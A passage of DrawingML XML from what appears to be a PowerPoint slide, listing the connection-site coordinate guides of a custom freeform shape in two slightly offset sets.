              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 223676 w 1438889"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 248415 w 1438889"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 225972 w 1438889"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 241063 w 1438889"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 258507 w 1438889"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 272547 w 1438889"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 325504 w 1438889"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 341191 w 1438889"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 384896 w 1438889"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 368119 w 1438889"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 345534 w 1438889"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 352698 w 1438889"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 335443 w 1438889"/>
              <a:gd name="connsiteY17" fmla="*/ 6270265 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 362471 w 1438889"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 340463 w 1438889"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 339261 w 1438889"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 354676 w 1438889"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 342063 w 1438889"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 327292 w 1438889"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 376804 w 1438889"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 355879 w 1438889"/>
              <a:gd name="connsiteY25" fmla="*/ 5676393 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 395471 w 1438889"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 442601 w 1438889"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 456169 w 1438889"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 472150 w 1438889"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 505643 w 1438889"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 515242 w 1438889"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 526468 w 1438889"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 527488 w 1438889"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 534829 w 1438889"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 538132 w 1438889"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 539116 w 1438889"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 534750 w 1438889"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 541427 w 1438889"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 538360 w 1438889"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 545190 w 1438889"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 552226 w 1438889"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 554957 w 1438889"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 551661 w 1438889"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 553215 w 1438889"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 560124 w 1438889"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 555980 w 1438889"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 571383 w 1438889"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 577286 w 1438889"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 582019 w 1438889"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 583312 w 1438889"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 581119 w 1438889"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 576599 w 1438889"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 571682 w 1438889"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 568247 w 1438889"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 548900 w 1438889"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 552973 w 1438889"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 538229 w 1438889"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 539378 w 1438889"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 537954 w 1438889"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 524249 w 1438889"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 525847 w 1438889"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 519269 w 1438889"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 520600 w 1438889"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 524954 w 1438889"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 530032 w 1438889"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 552626 w 1438889"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 552051 w 1438889"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 552358 w 1438889"/>
              <a:gd name="connsiteY68" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 552385 w 1438889"/>
              <a:gd name="connsiteY69" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 551000 w 1438889"/>
              <a:gd name="connsiteY70" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 549884 w 1438889"/>
              <a:gd name="connsiteY71" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 551617 w 1438889"/>
              <a:gd name="connsiteY72" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 555360 w 1438889"/>
              <a:gd name="connsiteY73" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 554826 w 1438889"/>
              <a:gd name="connsiteY74" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 563522 w 1438889"/>
              <a:gd name="connsiteY75" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 570868 w 1438889"/>
              <a:gd name="connsiteY76" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 570164 w 1438889"/>
              <a:gd name="connsiteY77" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 573607 w 1438889"/>
              <a:gd name="connsiteY78" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 581145 w 1438889"/>
              <a:gd name="connsiteY79" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 582816 w 1438889"/>
              <a:gd name="connsiteY80" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 600379 w 1438889"/>
              <a:gd name="connsiteY81" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 600804 w 1438889"/>
              <a:gd name="connsiteY82" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 602627 w 1438889"/>
              <a:gd name="connsiteY83" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 589462 w 1438889"/>
              <a:gd name="connsiteY84" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 589963 w 1438889"/>
              <a:gd name="connsiteY85" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 577563 w 1438889"/>
              <a:gd name="connsiteY86" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 562748 w 1438889"/>
              <a:gd name="connsiteY87" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 563413 w 1438889"/>
              <a:gd name="connsiteY88" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 554281 w 1438889"/>
              <a:gd name="connsiteY89" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 540890 w 1438889"/>
              <a:gd name="connsiteY90" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 513620 w 1438889"/>
              <a:gd name="connsiteY91" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 456234 w 1438889"/>
              <a:gd name="connsiteY92" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 405152 w 1438889"/>
              <a:gd name="connsiteY93" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 385246 w 1438889"/>
              <a:gd name="connsiteY94" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 375969 w 1438889"/>
              <a:gd name="connsiteY95" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 362930 w 1438889"/>
              <a:gd name="connsiteY96" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 368929 w 1438889"/>
              <a:gd name="connsiteY97" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 371541 w 1438889"/>
              <a:gd name="connsiteY98" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 347870 w 1438889"/>
              <a:gd name="connsiteY99" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 337757 w 1438889"/>
              <a:gd name="connsiteY100" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 321974 w 1438889"/>
              <a:gd name="connsiteY101" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 319432 w 1438889"/>
              <a:gd name="connsiteY102" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 320425 w 1438889"/>
              <a:gd name="connsiteY103" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 312231 w 1438889"/>
              <a:gd name="connsiteY104" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 293409 w 1438889"/>
              <a:gd name="connsiteY105" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 269966 w 1438889"/>
              <a:gd name="connsiteY106" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 223765 w 1438889"/>
              <a:gd name="connsiteY107" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 196076 w 1438889"/>
              <a:gd name="connsiteY108" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 195202 w 1438889"/>
              <a:gd name="connsiteY109" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 175997 w 1438889"/>
              <a:gd name="connsiteY110" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 189077 w 1438889"/>
              <a:gd name="connsiteY111" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 181819 w 1438889"/>
              <a:gd name="connsiteY112" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 167904 w 1438889"/>
              <a:gd name="connsiteY113" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 176211 w 1438889"/>
              <a:gd name="connsiteY114" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 177399 w 1438889"/>
              <a:gd name="connsiteY115" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 182084 w 1438889"/>
              <a:gd name="connsiteY116" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 174366 w 1438889"/>
              <a:gd name="connsiteY117" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 163672 w 1438889"/>
              <a:gd name="connsiteY118" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 152408 w 1438889"/>
              <a:gd name="connsiteY119" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 153864 w 1438889"/>
              <a:gd name="connsiteY120" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 156100 w 1438889"/>
              <a:gd name="connsiteY121" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 148729 w 1438889"/>
              <a:gd name="connsiteY122" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 118137 w 1438889"/>
              <a:gd name="connsiteY123" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 97087 w 1438889"/>
              <a:gd name="connsiteY124" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 96645 w 1438889"/>
              <a:gd name="connsiteY125" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 82316 w 1438889"/>
              <a:gd name="connsiteY126" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 67735 w 1438889"/>
              <a:gd name="connsiteY127" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 72746 w 1438889"/>
              <a:gd name="connsiteY128" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 58688 w 1438889"/>
              <a:gd name="connsiteY129" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 58369 w 1438889"/>
              <a:gd name="connsiteY130" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 37995 w 1438889"/>
              <a:gd name="connsiteY131" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 37243 w 1438889"/>
              <a:gd name="connsiteY132" fmla="*/ 465389 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 20166 w 1438889"/>
              <a:gd name="connsiteY133" fmla="*/ 424699 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 20541 w 1438889"/>
              <a:gd name="connsiteY134" fmla="*/ 404917 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 498 w 1438889"/>
              <a:gd name="connsiteY135" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 148559 w 1438889"/>
              <a:gd name="connsiteY136" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 140269 w 1438889"/>
              <a:gd name="connsiteY137" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 152553 w 1438889"/>
              <a:gd name="connsiteY138" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 112107 w 1438889"/>
              <a:gd name="connsiteY139" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 92101 w 1418883"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1418883 w 1418883"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1418883 w 1418883"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 155577 w 1418883"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 192170 w 1418883"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 203670 w 1418883"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 228409 w 1418883"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 205966 w 1418883"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 221057 w 1418883"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 238501 w 1418883"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 252541 w 1418883"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 305498 w 1418883"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 321185 w 1418883"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 364890 w 1418883"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 348113 w 1418883"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 325528 w 1418883"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 332692 w 1418883"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 315437 w 1418883"/>
              <a:gd name="connsiteY17" fmla="*/ 6270265 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 342465 w 1418883"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 320457 w 1418883"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 319255 w 1418883"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 334670 w 1418883"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 322057 w 1418883"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 307286 w 1418883"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 356798 w 1418883"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 335873 w 1418883"/>
              <a:gd name="connsiteY25" fmla="*/ 5676393 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 375465 w 1418883"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 422595 w 1418883"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 436163 w 1418883"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 452144 w 1418883"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 485637 w 1418883"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 495236 w 1418883"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 506462 w 1418883"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 507482 w 1418883"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 514823 w 1418883"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 518126 w 1418883"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 519110 w 1418883"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 514744 w 1418883"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 521421 w 1418883"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 518354 w 1418883"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 525184 w 1418883"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 532220 w 1418883"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 534951 w 1418883"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 531655 w 1418883"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 533209 w 1418883"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 540118 w 1418883"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 535974 w 1418883"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 551377 w 1418883"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 557280 w 1418883"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 562013 w 1418883"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 563306 w 1418883"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 561113 w 1418883"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 556593 w 1418883"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 551676 w 1418883"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 548241 w 1418883"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 528894 w 1418883"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 532967 w 1418883"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 518223 w 1418883"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 519372 w 1418883"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 517948 w 1418883"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 504243 w 1418883"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 505841 w 1418883"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 499263 w 1418883"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 500594 w 1418883"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 504948 w 1418883"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 510026 w 1418883"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 532620 w 1418883"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 532045 w 1418883"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 532352 w 1418883"/>
              <a:gd name="connsiteY68" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 532379 w 1418883"/>
              <a:gd name="connsiteY69" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 530994 w 1418883"/>
              <a:gd name="connsiteY70" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 529878 w 1418883"/>
              <a:gd name="connsiteY71" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 531611 w 1418883"/>
              <a:gd name="connsiteY72" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 535354 w 1418883"/>
              <a:gd name="connsiteY73" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 534820 w 1418883"/>
              <a:gd name="connsiteY74" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 543516 w 1418883"/>
              <a:gd name="connsiteY75" fmla="*/ 3738082 h 6858000"/>
